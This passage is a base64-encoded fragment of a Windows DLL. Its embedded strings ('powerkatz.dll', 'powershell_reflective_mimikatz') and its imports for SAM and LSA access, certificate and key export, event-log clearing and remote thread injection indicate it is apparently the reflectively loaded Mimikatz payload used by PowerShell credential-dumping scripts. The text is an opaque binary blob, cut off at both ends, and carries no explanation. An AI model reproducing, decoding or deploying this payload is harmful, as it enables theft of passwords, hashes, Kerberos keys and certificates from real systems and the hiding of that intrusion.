cnZpY2VIYW5kbGUAAK8ARGVsZXRlU2VydmljZQCuAU9wZW5TQ01hbmFnZXJXAACwAU9wZW5TZXJ2aWNlVwAATAJTdGFydFNlcnZpY2VXAMQBUXVlcnlTZXJ2aWNlU3RhdHVzRXgAAEIAQ29udHJvbFNlcnZpY2UAADsBSXNUZXh0VW5pY29kZQBQAENvbnZlcnRTaWRUb1N0cmluZ1NpZFcAAKwBT3BlblByb2Nlc3NUb2tlbgAAGgFHZXRUb2tlbkluZm9ybWF0aW9uAEoBTG9va3VwQWNjb3VudFNpZFcAWABDb252ZXJ0U3RyaW5nU2lkVG9TaWRXAACUAENyeXB0RXhwb3J0S2V5AACGAENyeXB0QWNxdWlyZUNvbnRleHRXAACaAENyeXB0R2V0S2V5UGFyYW0AAKAAQ3J5cHRSZWxlYXNlQ29udGV4dACTAENyeXB0RW51bVByb3ZpZGVyc1cAmwBDcnlwdEdldFByb3ZQYXJhbQCMAENyeXB0RGVzdHJveUtleQCcAENyeXB0R2V0VXNlcktleQCrAU9wZW5FdmVudExvZ1cABAFHZXROdW1iZXJPZkV2ZW50TG9nUmVjb3JkcwAAOgBDbGVhckV2ZW50TG9nVwAAZQBDcmVhdGVTZXJ2aWNlVwAAQwJTZXRTZXJ2aWNlT2JqZWN0U2VjdXJpdHkAACoAQnVpbGRTZWN1cml0eURlc2NyaXB0b3JXAADCAVF1ZXJ5U2VydmljZU9iamVjdFNlY3VyaXR5AAAdAEFsbG9jYXRlQW5kSW5pdGlhbGl6ZVNpZAAA4gBGcmVlU2lkAJkAQ3J5cHRHZXRIYXNoUGFyYW0AogBDcnlwdFNldEtleVBhcmFtAABwAlN5c3RlbUZ1bmN0aW9uMDMyAFUCU3lzdGVtRnVuY3Rpb24wMDUAnwBDcnlwdEltcG9ydEtleQAAaQJTeXN0ZW1GdW5jdGlvbjAyNQCIAENyeXB0Q3JlYXRlSGFzaACJAENyeXB0RGVjcnlwdAAAiwBDcnlwdERlc3Ryb3lIYXNoAABkAUxzYUZyZWVNZW1vcnkAnQBDcnlwdEhhc2hEYXRhALEBT3BlblRocmVhZFRva2VuAEUCU2V0VGhyZWFkVG9rZW4AALQARHVwbGljYXRlVG9rZW5FeAAAOABDaGVja1Rva2VuTWVtYmVyc2hpcAAAbABDcmVkRnJlZQAAawBDcmVkRW51bWVyYXRlVwAAQURWQVBJMzIuZGxsAAB3AENyeXB0QmluYXJ5VG9TdHJpbmdXAAB0AENyeXB0QWNxdWlyZUNlcnRpZmljYXRlUHJpdmF0ZUtleQBGAENlcnRHZXROYW1lU3RyaW5nVwAAUABDZXJ0T3BlblN0b3JlADwAQ2VydEZyZWVDZXJ0aWZpY2F0ZUNvbnRleHQAAAQAQ2VydEFkZENlcnRpZmljYXRlQ29udGV4dFRvU3RvcmUAAA8AQ2VydENsb3NlU3RvcmUAAEEAQ2VydEdldENlcnRpZmljYXRlQ29udGV4dFByb3BlcnR5ACkAQ2VydEVudW1DZXJ0aWZpY2F0ZXNJblN0b3JlACwAQ2VydEVudW1TeXN0ZW1TdG9yZQAJAVBGWEV4cG9ydENlcnRTdG9yZUV4AABDUllQVDMyLmRsbAAFAENETG9jYXRlQ1N5c3RlbQAEAENER2VuZXJhdGVSYW5kb21CaXRzAAAGAENETG9jYXRlQ2hlY2tTdW0AAAsATUQ1RmluYWwAAA0ATUQ1VXBkYXRlAAwATUQ1SW5pdABjcnlwdGRsbC5kbGwAAE4AUGF0aElzUmVsYXRpdmVXACIAUGF0aENhbm9uaWNhbGl6ZVcAJABQYXRoQ29tYmluZVcAAFNITFdBUEkuZGxsACYAU2FtUXVlcnlJbmZvcm1hdGlvblVzZXIABgBTYW1DbG9zZUhhbmRsZQAAFABTYW1GcmVlTWVtb3J5ABMAU2FtRW51bWVyYXRlVXNlcnNJbkRvbWFpbgAhAFNhbU9wZW5Vc2VyAB0AU2FtTG9va3VwTmFtZXNJbkRvbWFpbgAAHABTYW1Mb29rdXBJZHNJbkRvbWFpbgAAHwBTYW1PcGVuRG9tYWluAAcAU2FtQ29ubmVjdAAAEQBTYW1FbnVtZXJhdGVEb21haW5zSW5TYW1TZXJ2ZXIAABgAU2FtR2V0R3JvdXBzRm9yVXNlcgAsAFNhbVJpZFRvU2lkABsAU2FtTG9va3VwRG9tYWluSW5TYW1TZXJ2ZXIAABUAU2FtR2V0QWxpYXNNZW1iZXJzaGlwAFNBTUxJQi5kbGwAACgATHNhTG9va3VwQXV0aGVudGljYXRpb25QYWNrYWdlAAAlAExzYUZyZWVSZXR1cm5CdWZmZXIAIwBMc2FEZXJlZ2lzdGVyTG9nb25Qcm9jZXNzACIATHNhQ29ubmVjdFVudHJ1c3RlZAAhAExzYUNhbGxBdXRoZW50aWNhdGlvblBhY2thZ2UAAFNlY3VyMzIuZGxsAAcAQ29tbWFuZExpbmVUb0FyZ3ZXAABTSEVMTDMyLmRsbACYAUlzQ2hhckFscGhhTnVtZXJpY1cAVVNFUjMyLmRsbAAABQBNRDRVcGRhdGUAAwBNRDRGaW5hbAAABABNRDRJbml0AGFkdmFwaTMyLmRsbAAAFABSdGxVbmljb2RlU3RyaW5nVG9BbnNpU3RyaW5nAAANAFJ0bEZyZWVBbnNpU3RyaW5nABIAUnRsSW5pdFVuaWNvZGVTdHJpbmcAAAwAUnRsRXF1YWxVbmljb2RlU3RyaW5nAAEATnRRdWVyeU9iamVjdAACAE50UXVlcnlTeXN0ZW1JbmZvcm1hdGlvbgAADwBSdGxHZXRDdXJyZW50UGViAAAAAE50UXVlcnlJbmZvcm1hdGlvblByb2Nlc3MACQBSdGxDcmVhdGVVc2VyVGhyZWFkABMAUnRsU3RyaW5nRnJvbUdVSUQADgBSdGxGcmVlVW5pY29kZVN0cmluZwAAEABSdGxHZXROdFZlcnNpb25OdW1iZXJzAAAWAFJ0bFVwY2FzZVVuaWNvZGVTdHJpbmcAAAgAUnRsQXBwZW5kVW5pY29kZVN0cmluZ1RvU3RyaW5nAAAHAFJ0bEFuc2lTdHJpbmdUb1VuaWNvZGVTdHJpbmcAAAMATnRSZXN1bWVQcm9jZXNzAAYAUnRsQWRqdXN0UHJpdmlsZWdlAAAEAE50U3VzcGVuZFByb2Nlc3MAAAUATnRUZXJtaW5hdGVQcm9jZXNzAAALAFJ0bEVxdWFsU3RyaW5nAABudGRsbC5kbGwAxQBGaWxlVGltZVRvU3lzdGVtVGltZQAAWAJMb2NhbEFsbG9jAABcAkxvY2FsRnJlZQClA1dyaXRlRmlsZQC1AlJlYWRGaWxlAABWAENyZWF0ZUZpbGVXAO4ARmx1c2hGaWxlQnVmZmVycwAAZAFHZXRGaWxlU2l6ZUV4AEEBR2V0Q3VycmVudERpcmVjdG9yeVcAADQAQ2xvc2VIYW5kbGUAQgFHZXRDdXJyZW50UHJvY2VzcwCGAk9wZW5Qcm9jZXNzAHEBR2V0TGFzdEVycm9yAACTAER1cGxpY2F0ZUhhbmRsZQCKAERldmljZUlvQ29udHJvbAAcA1NldEZpbGVQb2ludGVyAACJA1ZpcnR1YWxRdWVyeQAAhANWaXJ0dWFsRnJlZQCKA1ZpcnR1YWxRdWVyeUV4AACFA1ZpcnR1YWxGcmVlRXgAuAJSZWFkUHJvY2Vzc01lbW9yeQCCA1ZpcnR1YWxBbGxvYwAAiANWaXJ0dWFsUHJvdGVjdEV4AACDA1ZpcnR1YWxBbGxvY0V4AACHA1ZpcnR1YWxQcm90ZWN0AACuA1dyaXRlUHJvY2Vzc01lbW9yeQAAaAJNYXBWaWV3T2ZGaWxlAHIDVW5tYXBWaWV3T2ZGaWxlAFUAQ3JlYXRlRmlsZU1hcHBpbmdXAABfAkxvY2FsUmVBbGxvYwAAaQBDcmVhdGVQcm9jZXNzVwAAKQNTZXRMYXN0RXJyb3IAAJEDV2FpdEZvclNpbmdsZU9iamVjdABqAENyZWF0ZVJlbW90ZVRocmVhZAAASAFHZXREYXRlRm9ybWF0VwAA4QFHZXRUaW1lRm9ybWF0VwAAxABGaWxlVGltZVRvTG9jYWxGaWxlVGltZQDVAEZpbmRGaXJzdEZpbGVXAADKAUdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAGEBR2V0RmlsZUF0dHJpYnV0ZXNXAADOAEZpbmRDbG9zZQDdAEZpbmROZXh0RmlsZVcA+ABGcmVlTGlicmFyeQBVAkxvYWRMaWJyYXJ5VwAAoAFHZXRQcm9jQWRkcmVzcwAAggFHZXRNb2R1bGVIYW5kbGVXAABXA1NsZWVwAPICU2V0Q29uc29sZUN1cnNvclBvc2l0aW9uAAC5AUdldFN0ZEhhbmRsZQAAyABGaWxsQ29uc29sZU91dHB1dENoYXJhY3RlclcANwFHZXRDb25zb2xlU2NyZWVuQnVmZmVySW5mbwAAQwJJc1dvdzY0UHJvY2VzcwAACwNTZXRDdXJyZW50RGlyZWN0b3J5VwAARQFHZXRDdXJyZW50VGhyZWFkAABDAUdldEN1cnJlbnRQcm9jZXNzSWQAS0VSTkVMMzIuZGxsAAAcBV92c2N3cHJpbnRmAHEFd2NzcmNocgBoBXdjc2NocgAAHwVfd2NzaWNtcAAAEgVfc3RyaWNtcAAAIQVfd2NzbmljbXAAcwV3Y3NzdHIAAHYFd2NzdG91bAB0BXdjc3RvbAAAVgFfZXJybm8AAEIFdmZ3cHJpbnRmAJUEZmZsdXNoAAAnBF93Zm9wZW4AbwFfZmlsZW5vANsBX2lvYgAAkgRmY2xvc2UAAKYEZnJlZQAA6gNfd2NzZHVwAG1zdmNydC5kbGwAAO4EbWVtc2V0AADqBG1lbWNweQAAagBfWGNwdEZpbHRlcgDeBG1hbGxvYwAA1QFfaW5pdHRlcm0AAQFfYW1zZ19leGl0AACFBGNhbGxvYwAAwARpc2RpZ2l0AOcEbWJ0b3djAACwAF9fbWJfY3VyX21heAAAwgRpc2xlYWRieXRlAADVBGlzeGRpZ2l0AADZBGxvY2FsZWNvbnYAAC8DX3NucHJpbnRmADECX2l0b2EAbgV3Y3RvbWIAAJQEZmVycm9yAADMBGlzd2N0eXBlAABpBXdjc3RvbWJzAAD/BHJlYWxsb2MAhQBfX2JhZGlvaW5mbwDPAF9fcGlvaW5mbwAEA19yZWFkAEsCX2xzZWVraTY0AEgEX3dyaXRlAADeAV9pc2F0dHkAPQV1bmdldGMAAI0CT3V0cHV0RGVidWdTdHJpbmdBAADXAlJ0bFVud2luZAApAkludGVybG9ja2VkRXhjaGFuZ2UAJgJJbnRlcmxvY2tlZENvbXBhcmVFeGNoYW5nZQAAXwNUZXJtaW5hdGVQcm9jZXNzAABvA1VuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAASwNTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAowJRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDfAUdldFRpY2tDb3VudAAARgFHZXRDdXJyZW50VGhyZWFkSWQAAAIFX2Noa3N0awAABV9hdWxscmVtAAAAAAAAAAAb3eJUAAAAANKxAgABAAAAAQAAAAEAAADIsQIAzLECANCxAgAOTAAA4LECAAAAcG93ZXJrYXR6LmRsbABwb3dlcnNoZWxsX3JlZmxlY3RpdmVfbWltaWthdHoAAE7mQLuxGb9EAAAAAAAAAAAwlAEQIOcBECAFkxkAAAAAAAAAAAAAAAD//////////ydmARAAAAAAAAQAAAH8//81AAAACwAAAEAAAAD/AwAAgAAAAIH///8YAAAACAAAACAAAAB/AAAAAAAAAAAAAAAAoAJAAAAA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